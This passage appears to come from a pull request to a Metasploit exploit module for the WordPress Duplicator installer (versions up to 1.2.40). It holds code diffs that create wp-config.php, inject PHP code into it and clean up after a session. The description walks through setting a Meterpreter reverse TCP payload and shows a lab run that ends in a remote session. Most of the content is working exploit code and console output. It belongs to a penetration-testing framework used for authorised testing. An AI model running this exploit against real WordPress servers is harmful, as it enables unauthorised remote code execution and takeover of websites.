+        print_error("The archive file #{archive_name} was probably deleted.")
+        return
+      end
+    else
+      print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
+      return
+    end
   end
 
   def exploit
@@ -81,36 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
       print_status("This WordPress was not restored. Creating the wp-config.php file...")
-      # 1. GET the installer.php to retrieve the archive name.
-      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
-      if response && response.code == 200
-        archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
-        archive_name = archive_name.first.first
-        print_status("Found archive name #{archive_name}")
-        # 2. Perform the 1st step to actually create the wp-config.php file.
-        response = send_request_cgi({
-          'method' => 'POST',
-          'uri'    => normalize_uri(datastore['TARGETURI']),
-          'vars_post'   => {
-            'action_ajax' => "1",
-            'action_step' => "1",
-            'archive_name' => archive_name,
-            'archive_engine' => "ziparchive",
-            'exe_safe_mode' => "0",
-            'archive_filetime' => "current",
-            'logging' => "1"
-          }
-        }, timeout=datastore['TIMEOUT'])
-        if response && response.code == 200
-          print_status("Successfully created the wp-config.php file!")
-        else
-          print_error("The archive file #{archive_name} was probably deleted.")
-          return
-        end
-      else
-        print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
-        return
-      end
+      create_wp_config_file()
     end
 
     # 2. Exploit the code injection.
@@ -135,22 +139,5 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       print_error("Failed to inject PHP code in wp-config.php...")
     end
-  end
-
-  def on_new_session(session)
-    print_status("Cleaning up...")
-    send_request_cgi({
-      'method' => 'POST',
-      'uri'    => normalize_uri(datastore['TARGETURI']),
-      'vars_post'   => {
-        'action_ajax' => "3",
-        'action_step' => "3",
-        'dbhost' => rand_text_alphanumeric(20),
-        'dbname' => rand_text_alphanumeric(20),
-        'dbpass' => rand_text_alphanumeric(20),
-        'dbuser' => "test",
-        'dbport' => rand_text_numeric(5)
-      }
-    }, timeout=datastore['TIMEOUT'])
   end
 end

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -141,4 +141,14 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error("Failed to inject PHP code in wp-config.php...")
     end
   end
+
+  def on_new_session(client)
+    if client.type.eql? 'meterpreter'
+      client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
+      client.fs.file.rm 'wp-config.php'
+    else
+      client.shell_command_token 'rm wp-config.php'
+    end
+    create_wp_config_file
+  end
 end

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Checking URI #{rhost+tpath}")
     response = send_request_cgi({ 'uri' => tpath})
-    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if response && response.code == 200
+        version = response.body.to_s.scan( /version: ([^<]*)</).last.first
         return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
         Exploit::CheckCode::Safe
     else


### PR DESCRIPTION
Duplicator is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
* An ZIP archive with the complete WordPress files and Duplicator specific files:
  * A copy of the installer.php script: installer-backup.php
  * A SQL script that will be used to restore the database content: database.sql
* An installer PHP script to restore the archive installer.php

When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:
* The ZIP archive
* database.sql 
* installer-backup.php 
* installer-data.sql 
* installer-log.txt 
* installer.php 

## Vulnerable application

Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup.
Put the install.php and archive files on a clean web server.

## Verification Steps


Confirm that check functionality works:
- [x] Open a browser to check the installer.php file is accessible
- [x] Start `msfconsole`
- [x] `use exploit/multi/php/wordpress_duplicator-`
- [x] Set the `RHOST`.
- [x] Confirm the target is vulnerable: `check`
- [x] Confirm that the target is vulnerable: `The target is vulnerable.`

Confirm that command execution functionality works:
- [x] Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
- [x] Set `LHOST` and `LPORT`
- [x] Run the exploit: `run`
- [x] Confirm you have now a meterpreter session

## Options

**TARGETURI**

The path to the installer.php file to exploit By default, the path is `/installer.php`.


## Scenarios

### Meterpreter reverse tcp

```
msf5 > use exploit/multi/php/wordpress_duplicator 
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 192.168.56.101

meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
```